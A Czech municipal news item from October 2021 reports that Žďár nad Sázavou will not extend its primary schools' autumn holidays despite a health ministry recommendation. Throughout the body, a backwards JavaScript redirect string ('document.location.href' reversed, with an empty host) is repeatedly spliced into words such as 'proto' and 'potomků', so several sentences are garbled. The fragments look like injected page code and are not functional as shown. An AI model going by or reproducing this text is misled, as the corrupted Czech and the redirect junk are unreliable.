Rainbow page separator

Žďárským školákům se podzimní prázdniny prodlužovat nebudou

Neděle, 24. října 2021

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Možné pondělní a úterní volno k prodloužení podzimních prázdnin, které v souvislosti se zhoršující se epidemiologickou situací doporučilo zřizovatelům škol ministerstvo zdravotnictví, se žďárských dětí nedotkne. Žďár coby zřizovatel čtyř základních škol rozhodl, že [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nařizovat nebude. „Jako zřizovatel žádné kroky podnikat nechceme a budeme se nadále řídit platnými nařízeními ministerstev školství a zdravotnictví, případně instrukcemi hygieny. Shodně s řediteli jednotlivých škol vnímáme situaci tak, že po měsících uzavření škol je nyní třeba k výuce využít každého dne,“ vyjádřil se vedoucí odboru školství, kultury a marketingu žďárského městského úřadu Petr Sedlák.
Ředitelé žďárských základních škol pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ponechají výuku i podzimní prázdniny nastavené tak, jak bylo v plánu. K rozhodnutí došlo taktéž s ohledem na skutečnost, že pro řadu rodičů by bylo problematické během krátké doby zajistit hlídání svých po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomků, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zejména mladšího školního věku. Podzimní prázdniny, které jsou stanoveny na středu 27. a pátek 29. října, doplní ještě čtvrtek 28. října jakož[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to státní svátek spojený se vznikem samostatného československého státu.